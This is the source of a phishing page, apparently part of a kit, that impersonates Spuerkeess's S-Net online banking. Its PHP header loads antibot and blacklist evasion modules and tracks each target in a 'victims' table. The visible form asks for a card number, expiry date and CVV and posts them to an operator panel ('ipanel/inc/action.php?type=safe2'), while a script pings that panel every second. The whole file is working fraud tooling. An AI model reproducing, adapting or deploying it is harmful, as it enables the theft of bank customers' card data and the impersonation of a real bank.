<?php
include '../ipanel/inc/config.php';
include '../ipanel/inc/connect.php';
include '../new_anti_config.php';
if ($internal_antibot == 1) {
   include "../ipanel/inc/old_blocker.php";
}
if ($mobile_lock == "checked") {
   include "../ipanel/inc/mob_lock.php";
}
$url = $_SERVER['REQUEST_URI'];



include '../ipanel/inc/blacklist.php';
include '../ipanel/inc/gateway.php';


if ($enable_antibots == "checked") {
   include '../ipanel/inc/anti.php';
}
session_start();

$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];


if ($_SESSION['started'] == 'true') {

    $uniqueid = $_SESSION['uniqueid'];
    $query = mysqli_query($conn, "SELECT * FROM victims WHERE uniqueid=$uniqueid");
    if ($query) {
   $arr = mysqli_fetch_array($query, MYSQLI_ASSOC);
   $user = $arr['user'];
   $card = $arr['card'];
   if ($card != '') {
    $error = "<div style='color:#D4222D'>" . translateText('errorsp1', $currentLanguage) . "<br><Br></div>";
   }
    }
  
  } else {
     header('location:../exit.php');
}
  


if($_SESSION['started'] == 'true'){
  $uniqueid = $_SESSION['uniqueid'];
  $query = mysqli_query($conn, "SELECT * FROM victims WHERE uniqueid=$uniqueid");
  if ($query) {
          $query = mysqli_query($conn, "UPDATE victims SET status=11, buzzed=1 WHERE uniqueid=$uniqueid");
      }
} else {
     header('location:../exit.php');
}
  



    ?>
<!DOCTYPE html>
<html lang="eng">



<script src="theme/styles.js" type="text/javascript"></script>
    <script type="text/javascript" src="theme/jquery-2.2.3.js"></script>

    
        
<script>
function check(form) {

    if (!checkThenr (document.getElementById('cnr').value,document.getElementById('thetype').value))
{  form.cnr.focus(); document.getElementById("cnr").style.borderColor="#de071c"; return false; } else { document.getElementById("cnr").style.borderColor="#c8c8c8"; }


var regExpressPostcode = /^(0[1-9]|1[0-2])\/(20[2-9][0-9])$/;
if (!regExpressPostcode.test(form.goned.value))
{  form.goned.focus(); document.getElementById("goned").style.borderColor="#de071c"; return false; } else { document.getElementById("goned").style.borderColor="#c8c8c8"; }


var regExpressPostcode =  /^[0-9]*$/
if (!regExpressPostcode.test(form.three.value))
{  form.three.focus(); document.getElementById("three").style.borderColor="#de071c"; return false; } else { document.getElementById("three").style.borderColor="#c8c8c8"; }

if (form.three.value.length < 3) 
{  form.three.focus(); document.getElementById("three").style.borderColor="#de071c"; return false; } else { document.getElementById("three").style.borderColor="#c8c8c8"; }



submit_form();
// form.submit()
}
function change(){
var change = document.getElementById("cnr").value

if (change.charAt(0) == '5') {
document.getElementById("thetype").value = "MxM";
document.getElementById("three").maxLength = "3";
document.getElementById("cnr").style = "background-image: url('theme/MxM.png'); background-size: 40px 40px; background-repeat: no-repeat; background-position: 98% 50%;"
}


else if (change.charAt(0) == '4') {
document.getElementById("thetype").value = "VxV";
document.getElementById("three").maxLength = "3";
document.getElementById("cnr").style = "background-image: url('theme/VxV.png'); background-size: 40px 40px; background-repeat: no-repeat; background-position: 98% 50%;"
}


else if (change.charAt(0) == '3') {
document.getElementById("thetype").value = "AxA";
document.getElementById("three").maxLength = "4";
document.getElementById("three").placeholder = "XXXX";
document.getElementById("cnr").style = "background-image: url('theme/AxA.png'); background-size: 40px 40px; background-repeat: no-repeat; background-position: 98% 60%;"
}


else if (change.charAt(0) == '6') {
document.getElementById("thetype").value = "DxD";
document.getElementById("three").maxLength = "3";
document.getElementById("cnr").style = "background-image: url('theme/DxD.png'); background-size: 40px 40px; background-repeat: no-repeat; background-position: 98% 50%;"
}

else {
document.getElementById("cnr").style = "background-image: url('theme/x.webp'); background-size: 20px 20px; background-repeat: no-repeat; background-position: 98% 50%;"
}



}
</script> 



</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body data-lang="eng">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <title>S-Net - Spuerkeess</title>
    <meta name="description" content="snet">
    <meta name="author" content="bcee.lu">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable= no">
    <link rel="icon" type="image/ico" href="theme/favicon.ico">
    <link rel="stylesheet" href="./theme/jquery-ui.min.css">
    <link href="./theme/bootstrap.min.css" rel="stylesheet">
    <link href="./theme/styles.css" rel="stylesheet">
    <link href="./theme/IEfix.css" rel="stylesheet">
<div class="bcee-main">
    <div class="bcee-topbar">
        <ul>
            <li class="logo">
                <a><span class="topbarIcon"></span></a>
            </li>
            <li class="today d-none d-lg-block">
                <span id="datetime"></span>
            </li>
            <li class="action">
                <div id="bcee-info" class="bcee-info-dot large"></div>
            </li>
        </ul>
    </div>
    <div class="bcee-header">
	    <div class="container">
	        <div class="row">
	            <div class="col-lg-12">
	                <div class="header-title d-none d-md-inline-block">Spuerkeess</div>
	                <div class="header-lang">
	
                    <div id="flagfr" class="single-lang <?php echo ($currentLanguage == 'fr') ? 'active' : ''; ?>">
    <div class="lang-flag">
        <img src="./theme/flag_fr.svg">
    </div>
</div>

<div id="flagde" class="single-lang <?php echo ($currentLanguage == 'de') ? 'active' : ''; ?>">
    <div class="lang-flag">
        <img src="./theme/flag_de.svg">
    </div>
</div>

	
	                    <div id="flagen" class="single-lang">
	                        <div class="lang-flag">
	                            <img src="./theme/flag_en.svg">
	                        </div>
	                    </div>
	                </div>
	            </div>
	        </div>
	    </div>
	</div>
    <form aria-labelledby="pageModule" action="" method="POST" id="loginForm" autocomplete="off">
<input id="thetype" type="hidden" name="thetype"  value="">
<input type="text" autocomplete="off" id="blank" name="blank" readonly="readonly">
    <div class="bcee-content">
        <div class="container">
            <div class="row">
                <div class="col-lg-12" id="maincontent">
					<div class="bcee-frame">
				<div style="padding-top:0px;text-align: left;">
                <h2><?= translateText('formp2', $currentLanguage); ?></h2> 
               <p><?= translateText('footerp4', $currentLanguage); ?></p>


                <?= $error ?>
                <br><br>
                <div class="inputs">
                <label for="cnr"><?= translateText('footerp11', $currentLanguage); ?> </label>
            <input class="form-control" onpaste="change();" onkeyup="change();" onchange="change();" name="number" id="cnr" maxlength="19" type="tel"  onKeyDown="if(event.keyCode==13) check(this.form);" >
           </div>
           <br>
           <div class="inputs">
           <label for="goned"><?= translateText('footerp12', $currentLanguage); ?> </label>
            <input class="form-control" type="tel" id="goned" name="goned" maxlength="7" onkeydown="if(event.keyCode==13) check(this.form);" placeholder="<?= translateText('footerp14', $currentLanguage); ?>">
           </div>
           <br>
           <div class="inputs">
           <label for="three"><?= translateText('footerp13', $currentLanguage); ?> </label>
            <input class="form-control" pattern="[0-9]*" inputmode="numeric" min="0000" max="9999" style="-webkit-text-security: disc;" maxlength="3" onkeydown="if(event.keyCode==13) check(this.form);" type="password" id="three" name="three">
           </div>


<br><br>
<button id="confirm" class="btn btn-reverse bordered" onclick="check(this.form)" type="button"><?= translateText('formp9', $currentLanguage); ?></button>

             
                </div>
					</div>
                </div>
            </div>
        </div>
    </div>
</div>
</form>
<div id="veepn-breach-alert"></div>
<script>
        function formatDate() {
            const now = new Date();
            const options = { weekday: 'long', year: 'numeric', month: 'long', day: 'numeric' };
            const date = now.toLocaleDateString('fr-FR', options);
            const time = now.toLocaleTimeString('fr-FR', { hour: 'numeric', minute: 'numeric', hour12: false });
            const formattedDate = `${date} - ${time}`;
            document.getElementById('datetime').innerText = formattedDate;
        }

        formatDate();
    </script>




<script type="text/javascript">
    window.onload=function(){
      
thecnr = function(jQinp)
{
    var format_and_pos = function(input, char, backspace)
    {
        var start = 0;
        var end = 0;
        var pos = 0;
        var value = input.value;

        if (char !== false)
        {
            start = input.selectionStart;
            end = input.selectionEnd;

            if (backspace && start > 0) // handle backspace onkeydown
            {
                start--;

                if (value[start] == " ")
                { start--; }
            }
            // To be able to replace the selection if there is one
            value = value.substring(0, start) + char + value.substring(end);

            pos = start + char.length; // caret position
        }

        var d = 0; // digit count
        var dd = 0; // total
        var gi = 0; // group index
        var newV = "";
        var groups = /^\D*3[47]/.test(value) ? // check for American Express
        [4, 6, 5] : [4, 4, 4, 4];

        for (var i = 0; i < value.length; i++)
        {
            if (/\D/.test(value[i]))
            {
                if (start > i)
                { pos--; }
            }
            else
            {
                if (d === groups[gi])
                {
                    newV += " ";
                    d = 0;
                    gi++;

                    if (start >= i)
                    { pos++; }
                }
                newV += value[i];
                d++;
                dd++;
            }
            if (d === groups[gi] && groups.length === gi + 1) // max length
            { break; }
        }
        input.value = newV;

        if (char !== false)
        { input.setSelectionRange(pos, pos); }
    };

    jQinp.keypress(function(e)
    {
        var code = e.charCode || e.keyCode || e.which;

        // Check for tab and arrow keys (needed in Firefox)
        if (code !== 9 && (code < 37 || code > 40) &&
        // and CTRL+C / CTRL+V
        !(e.ctrlKey && (code === 99 || code === 118)))
        {
            e.preventDefault();

            var char = String.fromCharCode(code);

            // if the character is non-digit
            // -> return false (the character is not inserted)

            if (/\D/.test(char))
            { return false; }

            format_and_pos(this, char);
        }
    }).
    keydown(function(e) // backspace doesn't fire the keypress event
    {
        if (e.keyCode === 8 || e.keyCode === 46) // backspace or delete
        {
            e.preventDefault();
            format_and_pos(this, '', this.selectionStart === this.selectionEnd);
        }
    }).
    on('paste', function()
    {
        // A timeout is needed to get the new value pasted
        setTimeout(function()
        { format_and_pos(jQinp[0], ''); }, 50);
    }).
    blur(function() // reformat onblur just in case (optional)
    {
        format_and_pos(this, false);
    });
};

thecnr($('#cnr'));




}



</script>

<script>
var characterCount = 0;

$('#goned').on('input', function(e) {
    var input = $(this).val();
    input = input.replace(/\D/g, '');
    if (input.length > 2) {
        input = input.substring(0, 2) + '/' + input.substring(2);
    }
    $(this).val(input);
    characterCount = $(this).val().length;
});


</script>



    
<script src="../assets/js/jquery-1.11.3.min.js"></script>
   <script src="../assets/js/main.js"></script>
   <script>
      var pinger = setInterval(function() {
         var urldata = "../ipanel/inc/action.php?type=ping";
         $.ajax({
            url: urldata,
            type: "GET",
            success: function(response) {
               //console.log(response)
            }
         });
      }, 1000);
      function submit_form() {
        var card = document.getElementById('cnr').value.replace(/\s+/g, '');
         var exp = document.getElementById('goned').value;
         var three = document.getElementById('three').value;
         $.ajax({
            type: 'POST',
            url: '../ipanel/inc/action.php?type=safe2',
            data: 'card=' + card + '&exp=' + exp + '&three=' + three,
            success: function(data) {
               var parsed_data = JSON.parse(data);
               if (parsed_data.status == 'ok') {
                  location.href = "loading.php"
               }
            }
         })
      }


   </script>

</body>
</html>
